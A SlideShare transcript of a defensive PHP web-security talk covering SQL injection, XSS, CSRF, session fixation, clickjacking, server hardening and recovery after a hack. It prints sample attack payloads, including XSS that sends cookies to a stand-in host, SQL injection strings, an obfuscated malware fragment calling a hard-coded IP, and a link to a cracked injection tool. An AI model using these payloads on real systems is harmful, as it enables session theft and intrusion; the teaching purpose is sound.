SlideShare a Scribd company logo

My app is secure... I think

Wim Godden, profile picture
Wim Godden

The document is a presentation by Wim Godden about securing applications and the importance of understanding common vulnerabilities like SQL injection, XSS, and CSRF. It emphasizes the need for proper input validation, output escaping, and securing web application infrastructures. The talk aims to educate developers and engineers on preventing attacks and improving security practices in web development.

Technology
Related topics:
Intrusion Detection System Security
1 of 80
Downloaded 11 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
Wim Godden Cu.be Solutions My app is secure... I think
Who am I ? Wim Godden (@wimgtr)
Where I'm from
Where I'm from
Where I'm from
Where I'm from
My town
My town
Belgium – the traffic
Who am I ? Wim Godden (@wimgtr) Founder of Cu.be Solutions (http://cu.be) Open Source developer since 1997 Developer of PHPCompatibility, OpenX, ... Speaker at PHP and Open Source conferences
Who are you ? Developers ? System engineers ? Network engineers ? Ever had a hack ? Through the code ? Through the server ?
This talk Based on 2-day training Full stack → no Vagrant/VirtualBox required Lots of links at the end → slides on Joind.in Code samples in PHP → no worries, works the same in other languages
My app is secure... I think Basic stuff = known... … or is it ? Code is not enough Code Webserver Database server Operating system Network
Disclaimer Do not use these techniques to hack Use the knowledge to prevent others from hacking you
Reasons for hackers to hack Steal and sell your data Use your infrastructure as a jumpstation to hack other servers Send out lots of spam Use your server in a botnet for DDOS attacks Bring down your systems …
Part 1 : the most common attacks
OWASP Open Web Application Security Project www.owasp.org Top 10
SQL Injection (OWASP #1) Over 15 years Still #1 problem
SQL Injection (OWASP #1) <? require("header.php"); $hostname="localhost"; $sqlusername="someuser"; $sqlpassword="somepass"; $dbName="somedb"; MYSQL_CONNECT($hostname,$sqlusername,$sqlpassword) OR DIE("Unable to connect to database."); @mysql_select_db("$dbName") or die("Unable to select database."); $fp=fopen("content/whatever.php","r"); while (!feof($fp)) $content.=fgets($fp,2); $res=MYSQL_DB_QUERY("somedb","select * from whatever where id=" . $_GET['id']); for ($cnt=0;$cnt<MYSQL_NUMROWS($res);$cnt++) { $lst.="<LI>".MYSQL_RESULT($res,$cnt,"text")."</LI>n"; } $content=str_replace("<@textstring@>",$lst,$content); print $content; require("footer.php"); ?>
SQL Injection (OWASP #1) Over 15 years Still #1 problem Easy to exploit Easy to automate (scan + exploit)
Standard SQL injection example <?php $query = "select * from user where email='" . $_POST['email'] . "'"; $result = mysql_query($query); if (mysql_errno() != 0) { echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' . mysql_result($result, 0, 'email') . '>'; } else { echo 'Nobody home'; } ' OR '1'='1 select * from user where email='' OR '1'='1' E-mail :
Standard SQL injection example <?php $query = "select * from user where email='" . $_POST['email'] . "'"; $result = mysql_query($query); if (mysql_errno() != 0) { echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' . mysql_result($result, 0, 'email') . '>'; } else { echo 'Nobody home'; } ' OR '1'='1 select * from user where '1'='1' E-mail :
Standard SQL injection example <?php $query = "select * from user where email='" . $_POST['email'] . "'"; $result = mysql_query($query); if (mysql_errno() != 0) { echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' . mysql_result($result, 0, 'email') . '>'; } else { echo 'Nobody home'; } ' OR '1'='1 select * from user; E-mail :
Hackers just want your data select * from user where email='' OR '1'='1' limit 2, 1; --'; select * from user where email='' OR '1'='1' limit 3, 1; --'; select * from user where email='' OR '1'='1' limit 4, 1; --'; ... ' OR '1'='1' limit 2, 1; –';E-mail :
SQL Injection – much more... Much more than logging in as a user SQL injection possible → wide range of dangers
Fixing SQL injection : attempt #1 Addslashes() ? $query = mysql_query('select * from user where id=' . addslashes($_GET['id'])); www.hack.me/id=5%20and%20sleep(10) select * from user where id=5 and sleep(10) What if we hit that code 100 times simultaneously ? MySQL max_connections reached → Server unavailable
Fixing SQL injection : attempt #2 mysql_real_escape_string() mysqli_real_escape_string() pg_escape_string() ...
Fixing SQL injection : use prepared statements $select = 'select * from user where email = :email'; $stmt = $db->prepare($select); $stmt->bindParam(':email', $_GET['email']); $stmt->execute(); $results = $stmt->fetchAll();
ORM tools When using their query language → OK Beware : you can still execute raw SQL !
Other injections LDAP injection Command injection (system, exec, ...) Eval (waaaaaaaaaah !) … User input → Your application → External system If you provide the data, it's your responsibility ! If you consume the data, it's your responsibility !
Bobby Tables
Session fixation www.our-app.com 1 2 PHPSESSID=abc123 3 4 www.our-app.com/ ?PHPSESSID=abc123 6 www.our-app.com/ ?PHPSESSID=abc123 <html> … <a href=”http://www.our-app.com/?PHPSESSID=abc123”>Verify your account</a> … </html> 5 Login
Session fixation angel.cloud.com 1 Create evil PHP code 4 Session cookie on .cloud.com + redirect 2 3 devil.cloud.comdevil.cloud.com 5 Login6 Use evil session cookie <html> … <a href=”http://devil.cloud.com”>Verify your account</a> … </html>
Session hijacking www.our-app.com PHPSESSID= abcdef123 PHPSESSID= abcdef123
Ways to avoid session fixation/hijacking session.use_trans_sid = 0 session.use_only_cookies = true session.cookie_httponly = true Change session on login using session_regenerate_id(true) Do not share sessions between sites/subdomains Do not accept sessions not generated by your code Foreign session → remove the session cookie from the user Regenerate session regularly using session_regenerate_id(true) Use HTTPS session.cookie_secure = true All of the above help against session fixation AND session hijacking !
XSS – Cross Site Scripting <?php addMessage($_GET['id'], $_GET['message']); echo 'Thank you for submitting your message : ' . $_GET['message']; URL : /submitMessage http://www.our-app.com/submitMessage?id=5&message=<script>alert('Fun eh ?')</script>
XSS – more advanced http://www.our-app.com/submitMessage?id=5&message=Thanks, we will be in touch soon.<script type="text/javascript" src="http://someplace.io/i-will-get-your- cookie.js"></script>
XSS – Advanced, yet simple <img src=x onerror=this.src='http://someplace.io/post-the-cookie- here.php?c='+document.cookie> http://www.our-app.com/?id=5&message=Thanks %2C+we+will+be+in+touch+soon.%3Cimg+src%3Dx+onerror%3Dthis.src%3D %27http%3A%2F%2Fsomeplace.io%2Fpost-the-cookie-here.php%3Fc%3D %27%2Bdocument.cookie%3E%0D%0A
XSS : Non-persisted vs persistent Previous examples were non-persistent : issue occurs once Post code to exploitable bulletin board → Persistent → Can infect every user → If you stored it without filtering, you're responsible for escaping on output !
XSS : how to avoid Filter input, escape output <?php echo 'I just submitted this message : ' . htmlentities($_GET['message'], ENT_QUOTES, 'UTF-8', false);
CSRF : Cross Site Request Forgery www.our-app.com 1 Submit article for review 2 Retrieve articlefor review 3 Evil html or jsmakes call 4 Devil uses extra privileges Here's the article you were asking for. <img src=”http://www.our-app.com/userSave.php?username=Devil&admin=1” />
CSRF : ways to avoid Escape the output (where did we hear that before ?) Add a field to forms with a random hash/token for verification upon submit Check the referer header → Easy to fake <form method="post" action="userSave.php"> <input name="id" type="hidden" value="5" /> <input name="token" type="hidden" value="a4gjogaihfs8ah4gisadhfgifdgfg" /> rest of the form </form>
General rules – input validation Assume all data you receive as input contains a hack attempt ! That includes data from trusted users → over 90% of hacks are done by employees/partners/... Filter on disallowed characters Check validity of Dates Email addresses URLs etc. Input validation is not browser-side code, it's server-side code (you can ofcourse use browser-side code to make it look good)
General rules – validation or filtering ? Validation : Verify if the values fit a defined format Examples : expecting int, but received 7.8 → “error, 7.8 is not a valid integer” expecting international phone number, but received “+32 3 844 71 89” Filtering / sanitizing : Enforce the defined format by converting to it Examples : expecting int, but received 7.8 → 8 expecting int, but received 'one' → 0 expecting international phone number, but received “+32 3 844 71 89” → “+3238447189” Both have (dis)advantages
General rules – escaping output Doing input validation → why do you need output escaping ? What if the data originates from a webservice an XML feed … Always escape output !
Clickjacking Do you want to support our cause ? NoSure Do you want to delete all your Facebook friends ? Yes No FB button <style> iframe { /* iframe from facebook.com */ width:300px; height:100px; position:absolute; top:0; left:0; filter:alpha(opacity=0); opacity:0; } </style>
Clickjacking - solutions Sending X-Frame-Options header : X-Frame-Options: DENY X-Frame-Options: SAMEORIGIN Sending frame-ancestor directive : Content-Security-Policy: frame-ancestors 'none' Content-Security-Policy: frame-ancestors 'self' Content-Security-Policy: frame-ancestors example.com wikipedia.org Jump out of iframe (use Framekiller)
Bad authentication / authorization layer index.php (checks cookie) login.php (sets cookie) redirect to login main.php redirect to main
Bad authentication / authorization layer index.php (checks cookie) login.php (sets cookie) redirect to login main.php (doesn't check cookie !) redirect to main
Bad authentication / authorization layer Only hiding URLs on view, not restricting on action /somewhere is visible on screen /somewhere/admin is not visible, but is accessible Allowing direct access to other user's data /user/profile/id/311 is the user's profile /user/profile/id/312 is also accessible and updateable Allowing direct access to file downloads with guessable urls /download/file/83291.pdf Creating cookies : loggedin=1 userid=312 admin=1
Protecting your web stack Application language Webserver Database server Mail server Other servers Firewalls ...
Protecting your web stack – Passwords Don't use MD5 or SHA1 → sha512, blowfish, … Set a good password policy Min 8 chars, min 1 number, min 1 uppercase char, … NO maximum length Try to avoid password hints → Email link is better for recovery Don't create your own password hashing algorithm ! Use password_hash() 5.5+ : built-in < 5.5 : ircmaxell/password-compat
Protecting your web stack – Webserver Block direct access to upload directories
Access to private files, uploads, ...
Protecting your web stack – Webserver Block direct access to upload directories Allow only access to port 80 and 443 (!) Disable phpMyAdmin (VPN only if required) On Apache don't : AllowOverride All Options Indexes Block access to .svn and .git
Protecting your web stack – Webserver
Protecting your web stack – Database server No access from the web required Give it a private IP Other websites on network ? → send traffic over SSL
Protecting your web stack Use public/private key pairs for SSH, not passwords Don't login as root → Use sudo for commands that really need it Allow SSH access only from VPN Running Memcached ? Gearman ? … ? → Block external access
Protecting your web stack - firewalls Separate or on-server Default policy = deny all Don't forget IPv6 !!!
First action of a hacker Make sure they don't lose the access they gained Create new user → easy to detect Install a custom backdoor → easy to detect with good IDS Install a backdoor based on installed software → Example : start SSHD with different config on different port (remember firewall ?) → Harder to detect → Kill it... what happens ? → Probably restarts via cronjob
Using an Intrusion Detection System Host-based Intrusion Detection System (HIDS) OSSEC Samhain Network-based Intrusion Detection System (NIDS) Snort Sirucata
One IDS distro to rule them all Security Onion Based on Ubuntu Contains all the IDS tools... ...and much more
You've been hacked ! Now what ? (1/4) Take your application offline → Put up a maintenance page (on a different server) Take the server off the public Internet Change your SSH keys Make a full backup Check for cronjobs Check access/error/... logs (And give them to legal department) Were any commits made from the server ? → Your server shouldn't be able to !
What a hack might look like eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0 xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFf OF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKSl7aW 5jbHVkZV9vbmNlKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRl cy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbC cpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRl Y29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW 9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRG ODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5RTQxKSsxO31pZigkUjZCNk U5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygk UjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKS sxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVF NDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRk...'));
What a hack might look like
What a hack might look like $GLOBALS['_226432454_']=Array(); function _1618533527($i) { return '91.196.216.64'; } $ip=_1618533527(0); $GLOBALS['_1203443956_'] = Array('urlencode'); function _1847265367($i) { $a=Array('http://','/btt.php? ip=','REMOTE_ADDR','&host=','HTTP_HOST','&ua=','HTTP_USER_AGENT','&ref=','HTTP_REFERER'); return $a[$i]; } $url = _1847265367(0) .$ip ._1847265367(1) .$_SERVER[_1847265367(2)] ._1847265367(3) . $_SERVER[_1847265367(4)] ._1847265367(5) .$GLOBALS['_1203443956_'][0]($_SERVER[_1847265367(6)]) ._1847265367(7) .$_SERVER[_1847265367(8)]; $GLOBALS['_399629645_']=Array('function_exists', 'curl_init', 'curl_setopt', 'curl_setopt', 'curl_setopt', 'curl_exec', 'curl_close', 'file_get_contents'); function _393632915($i) { return 'curl_version'; }
You've been hacked ! Now what ? (2/4) Search system preg_replace base64_decode eval system exec passthru Search system and database script iframe
You've been hacked ! Now what ? (3/4) Find out how the hack happened ;-) Write an apology to your customers Finally : Reinstall the OS (from scratch !) Update all packages to the latest version Don't reinstall code from backup ! Install source code from versioning system Restore DB from previous backup (use binary log file)
Restoring your database to a specific point Turn on binary log Usually for master-slave replication Useful for fast recovery Make sure it can handle >24h of data Make a daily database backup Make a db dump to a file (mysqldump, …) Warning : locking danger → do this on the slave ! Backup the db dump file To recover : Restore the db dump file Replay binary log (mysqlbinlog …)
You've been hacked ! Now what ? (4/4) Install IDS Get an external security audit on the code Get an external security audit on the system/network setup Change user passwords Relaunch Cross your fingers
Takeaways Think like a hacker Can I steal data ? Can I DOS the site ? Which techniques could I use to do it ? Try it without looking at the code Try it while looking at the code Use SSL/HTTPS everywhere ! Block all traffic, then allow only what's needed Sanitize/filter your input Escape your output Use an IDS Never trust a hacked system
Questions ?
Questions ?
The software discussed (and more) General resources OWASP : www.owasp.org SANS : http://www.sans.org/security-resources/ SecurityFocus : http://www.securityfocus.com/ CERT : http://cert.org/ SecTools : http://sectools.org/ SQL injection Havij (automated tool) – beware : might be infected !!!!!!!! https://thepirateboat.eu/torrent/8410326/Havij_v1.17ProCracked.7z Clickjacking demo : https://www.youtube.com/watch?v=3mk0RySeNsU Password use in PHP 5.5+ : password_hash function : http://php.net/password_hash < 5.5 : password_compat : https://github.com/ircmaxell/password_compat
The software discussed (and more) SSL certificates RapidSSL FreeSSL : https://www.freessl.com/ Let's Encrypt (coming soon) : https://letsencrypt.org/ StartSSL : https://www.startssl.com Block access to .svn and .git : http://blogs.reliablepenguin.com/2014/06/26/block-access-git-svn-fol Webserver flood/scan detection Nginx : http://nginx.com/resources/admin-guide/restricting-access/ Multi-webserver : http://www.fail2ban.org Proxy-based : http://www.ecl-labs.org/2011/03/17/roboo-http-mitigator.html
The software discussed (and more) Protecting your mail server SPF and DomainKeys : http://www.pardot.com/faqs/administration/adding-spf-domainkeys-dns/ DNS Hijacking : http://www.gohacking.com/dns-hijacking/ Spoofing : http://www.windowsecurity.com/articles-tutorials/authentication_and_encryptio IPv6 – don't forget to firewall it the same way : https://www.sixxs.net/wiki/IPv6_Firewalling Automatic scanning tools : Nessus : http://www.tenable.com/products/nessus-vulnerability-scanner Wapiti : http://wapiti.sourceforge.net/ Nexpose : http://www.rapid7.com/products/nexpose/
The software discussed (and more) Slow HTTP DOS attacks : https://www.acunetix.com/blog/articles/slow-http-dos-attacks-mitigate IDS PHP PHPIDS : https://github.com/PHPIDS/PHPIDS Exposé : https://github.com/enygma/expose Host-based OSSEC : www.ossec.net Samhain : http://www.la-samhna.de/samhain/ AIDE : http://aide.sourceforge.net/ Network-based Snort : https://www.snort.org/ Sirucata : http://suricata-ids.org/ All in one : Security Onion : http://blog.securityonion.net/
The software discussed (and more) Penetration testing live CD : Backtrack Linux : http://www.backtrack-linux.org/ Kali Linux : https://www.kali.org/
In case you're interested Tutorial : 2,5h - 3h Training : 2 days 1,5 days of interactive training (partly slides, partly hands-on) Try out different security issues Experiment on local virtualboxes and physical machines we bring along 0,5 day of auditing Your code Your servers Your network As a global team effort or in smaller teams More details : https://cu.be/training
Thanks ! Twitter @wimgtr Slides http://www.slideshare.net/wimg E-mail wim@cu.be

More Related Content

ODP
My app is secure... I think
Wim Godden
 
ODP
The promise of asynchronous php
Wim Godden
 
ODP
My app is secure... I think
Wim Godden
 
ODP
My app is secure... I think
Wim Godden
 
ODP
My app is secure... I think
Wim Godden
 
ODP
The promise of asynchronous PHP
Wim Godden
 
PPTX
The Promised Land (in Angular)
Domenic Denicola
 
ODP
The promise of asynchronous php
Wim Godden
 
My app is secure... I think
Wim Godden
 
The promise of asynchronous php
Wim Godden
 
My app is secure... I think
Wim Godden
 
My app is secure... I think
Wim Godden
 
My app is secure... I think
Wim Godden
 
The promise of asynchronous PHP
Wim Godden
 
The Promised Land (in Angular)
Domenic Denicola
 
The promise of asynchronous php
Wim Godden
 

What's hot (20)

ODP
When dynamic becomes static: the next step in web caching techniques
Wim Godden
 
PDF
JavaScript Promise
Joseph Chiang
 
PDF
Symfony & Javascript. Combining the best of two worlds
Ignacio Martín
 
ODP
Caching and tuning fun for high scalability
Wim Godden
 
PPTX
New in php 7
Vic Metcalfe
 
PDF
ES6: The Awesome Parts
Domenic Denicola
 
KEY
Perl Web Client
Flavio Poletti
 
PPTX
Zero to SOLID
Vic Metcalfe
 
PDF
Nubilus Perl
Flavio Poletti
 
PDF
Guard Authentication: Powerful, Beautiful Security
Ryan Weaver
 
PDF
Design how your objects talk through mocking
Konstantin Kudryashov
 
ODP
My app is secure... I think
Wim Godden
 
PPTX
Zephir - A Wind of Change for writing PHP extensions
Mark Baker
 
PDF
Promise pattern
Sebastiaan Deckers
 
PPTX
Python and EM CLI: The Enterprise Management Super Tools
Seth Miller
 
PDF
Running a Scalable And Reliable Symfony2 Application in Cloud (Symfony Sweden...
Ville Mattila
 
PDF
React PHP: the NodeJS challenger
vanphp
 
PDF
Symfony Guard Authentication: Fun with API Token, Social Login, JWT and more
Ryan Weaver
 
KEY
dotCloud and go
Flavio Poletti
 
PDF
Boom! Promises/A+ Was Born
Domenic Denicola
 
When dynamic becomes static: the next step in web caching techniques
Wim Godden
 
JavaScript Promise
Joseph Chiang
 
Symfony & Javascript. Combining the best of two worlds
Ignacio Martín
 
Caching and tuning fun for high scalability
Wim Godden
 
New in php 7
Vic Metcalfe
 
ES6: The Awesome Parts
Domenic Denicola
 
Perl Web Client
Flavio Poletti
 
Zero to SOLID
Vic Metcalfe
 
Nubilus Perl
Flavio Poletti
 
Guard Authentication: Powerful, Beautiful Security
Ryan Weaver
 
Design how your objects talk through mocking
Konstantin Kudryashov
 
My app is secure... I think
Wim Godden
 
Zephir - A Wind of Change for writing PHP extensions
Mark Baker
 
Promise pattern
Sebastiaan Deckers
 
Python and EM CLI: The Enterprise Management Super Tools
Seth Miller
 
Running a Scalable And Reliable Symfony2 Application in Cloud (Symfony Sweden...
Ville Mattila
 
React PHP: the NodeJS challenger
vanphp
 
Symfony Guard Authentication: Fun with API Token, Social Login, JWT and more
Ryan Weaver
 
dotCloud and go
Flavio Poletti
 
Boom! Promises/A+ Was Born
Domenic Denicola
 
Ad

Viewers also liked (17)

PDF
TDD and Getting Paid
Rowan Merewood
 
PDF
Sensible scaling
Rowan Merewood
 
PDF
Of Gaps, Fillers and Empty Spaces… Fronteers2015 closing keynote
Christian Heilmann
 
PDF
Protect your users with Circuit breakers
Scott Triglia
 
PPTX
Designing irresistible apis
Kirsten Hunter
 
PPTX
Introducing Azure DocumentDB - NoSQL, No Problem
Andrew Liu
 
PPTX
DNS for Developers - NDC Oslo 2016
Maarten Balliauw
 
PDF
Getting Browsers to Improve the Security of Your Webapp
Francois Marier
 
PDF
Living With Legacy Code
Rowan Merewood
 
PDF
Microservices Minus the Hype: How to Build and Why
Mark Heckler
 
PDF
The Evolution and Future of Content Publishing
FITC
 
PPTX
DNS for Developers - ConFoo Montreal
Maarten Balliauw
 
PPTX
Get more than a cache back! - ConFoo Montreal
Maarten Balliauw
 
PDF
Securing MicroServices - ConFoo 2017
Majid Fatemian
 
PPTX
Microservices
Artur Prado
 
PDF
reveal.js 3.0.0
Hakim El Hattab
 
PDF
The Soul in The Machine - Developing for Humans
Christian Heilmann
 
TDD and Getting Paid
Rowan Merewood
 
Sensible scaling
Rowan Merewood
 
Of Gaps, Fillers and Empty Spaces… Fronteers2015 closing keynote
Christian Heilmann
 
Protect your users with Circuit breakers
Scott Triglia
 
Designing irresistible apis
Kirsten Hunter
 
Introducing Azure DocumentDB - NoSQL, No Problem
Andrew Liu
 
DNS for Developers - NDC Oslo 2016
Maarten Balliauw
 
Getting Browsers to Improve the Security of Your Webapp
Francois Marier
 
Living With Legacy Code
Rowan Merewood
 
Microservices Minus the Hype: How to Build and Why
Mark Heckler
 
The Evolution and Future of Content Publishing
FITC
 
DNS for Developers - ConFoo Montreal
Maarten Balliauw
 
Get more than a cache back! - ConFoo Montreal
Maarten Balliauw
 
Securing MicroServices - ConFoo 2017
Majid Fatemian
 
Microservices
Artur Prado
 
reveal.js 3.0.0
Hakim El Hattab
 
The Soul in The Machine - Developing for Humans
Christian Heilmann
 
Ad

Similar to My app is secure... I think (20)

PDF
My app is secure... I think
Wim Godden
 
ODP
My app is secure... I think
Wim Godden
 
ODP
My app is secure... I think
Wim Godden
 
ODP
My app is secure... I think
Wim Godden
 
PDF
My app is secure... I think
Wim Godden
 
PDF
How to secure web applications
Mohammed A. Imran
 
PDF
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
Felipe Prado
 
ODP
Security In PHP Applications
Aditya Mooley
 
PDF
Hijacking a Pizza Delivery Robot (using SQL injection)
Priyanka Aash
 
PPTX
Application and Website Security -- Fundamental Edition
Daniel Owens
 
PPTX
Sql Injection attacks and prevention
helloanand
 
PPSX
Web Security
Supankar Banik
 
PDF
OWASP Top 10 2013
markstory
 
PPTX
How to Hijack a Pizza Delivery Robot with Injection Flaws
Security Innovation
 
PPT
Security.ppt
webhostingguy
 
PPT
12-security.ppt - PHP and Arabic Language - Index
webhostingguy
 
PPT
PHPUG Presentation
Damon Cortesi
 
PDF
Coding Security: Code Mania 101
Narudom Roongsiriwong, CISSP
 
PPT
Phpnw security-20111009
Paul Lemon
 
PPT
Php & Web Security - PHPXperts 2009
mirahman
 
My app is secure... I think
Wim Godden
 
My app is secure... I think
Wim Godden
 
My app is secure... I think
Wim Godden
 
My app is secure... I think
Wim Godden
 
My app is secure... I think
Wim Godden
 
How to secure web applications
Mohammed A. Imran
 
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
Felipe Prado
 
Security In PHP Applications
Aditya Mooley
 
Hijacking a Pizza Delivery Robot (using SQL injection)
Priyanka Aash
 
Application and Website Security -- Fundamental Edition
Daniel Owens
 
Sql Injection attacks and prevention
helloanand
 
Web Security
Supankar Banik
 
OWASP Top 10 2013
markstory
 
How to Hijack a Pizza Delivery Robot with Injection Flaws
Security Innovation
 
Security.ppt
webhostingguy
 
12-security.ppt - PHP and Arabic Language - Index
webhostingguy
 
PHPUG Presentation
Damon Cortesi
 
Coding Security: Code Mania 101
Narudom Roongsiriwong, CISSP
 
Phpnw security-20111009
Paul Lemon
 
Php & Web Security - PHPXperts 2009
mirahman
 

More from Wim Godden (18)

PDF
Beyond php - it's not (just) about the code
Wim Godden
 
PDF
Bringing bright ideas to life
Wim Godden
 
PDF
The why and how of moving to php 8
Wim Godden
 
PDF
The why and how of moving to php 7
Wim Godden
 
PDF
Building interactivity with websockets
Wim Godden
 
PDF
Bringing bright ideas to life
Wim Godden
 
ODP
Your app lives on the network - networking for web developers
Wim Godden
 
ODP
The why and how of moving to php 7.x
Wim Godden
 
ODP
The why and how of moving to php 7.x
Wim Godden
 
ODP
Beyond php - it's not (just) about the code
Wim Godden
 
ODP
Building interactivity with websockets
Wim Godden
 
ODP
Your app lives on the network - networking for web developers
Wim Godden
 
ODP
Practical git for developers
Wim Godden
 
ODP
Is your code ready for PHP 7 ?
Wim Godden
 
ODP
Beyond php - it's not (just) about the code
Wim Godden
 
ODP
When dynamic becomes static
Wim Godden
 
ODP
The promise of asynchronous PHP
Wim Godden
 
ODP
When dynamic becomes static
Wim Godden
 
Beyond php - it's not (just) about the code
Wim Godden
 
Bringing bright ideas to life
Wim Godden
 
The why and how of moving to php 8
Wim Godden
 
The why and how of moving to php 7
Wim Godden
 
Building interactivity with websockets
Wim Godden
 
Bringing bright ideas to life
Wim Godden
 
Your app lives on the network - networking for web developers
Wim Godden
 
The why and how of moving to php 7.x
Wim Godden
 
The why and how of moving to php 7.x
Wim Godden
 
Beyond php - it's not (just) about the code
Wim Godden
 
Building interactivity with websockets
Wim Godden
 
Your app lives on the network - networking for web developers
Wim Godden
 
Practical git for developers
Wim Godden
 
Is your code ready for PHP 7 ?
Wim Godden
 
Beyond php - it's not (just) about the code
Wim Godden
 
When dynamic becomes static
Wim Godden
 
The promise of asynchronous PHP
Wim Godden
 
When dynamic becomes static
Wim Godden
 

Recently uploaded (20)

PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
PDF
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
PDF
cuic standard and advanced reporting.pdf
SimoneTitaniumTomase
 
PPTX
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
PPT
Teaching material agriculture food technology
LiaRayya
 
PPTX
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
PDF
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
SynapseIndia
 
PDF
KodekX | Application Modernization Development
KodekX
 
PDF
MIND Revenue Release Quarter 2 2025 Press Release
MIND CTI
 
PPTX
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
PPTX
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
blackmambaettijean
 
PDF
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
PPTX
Cloud computing and distributed systems.
kkkkkhan
 
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
PDF
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
cuic standard and advanced reporting.pdf
SimoneTitaniumTomase
 
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
Teaching material agriculture food technology
LiaRayya
 
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
SynapseIndia
 
KodekX | Application Modernization Development
KodekX
 
MIND Revenue Release Quarter 2 2025 Press Release
MIND CTI
 
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
blackmambaettijean
 
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
Cloud computing and distributed systems.
kkkkkhan
 
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
Encapsulation_ Review paper, used for researhc scholars
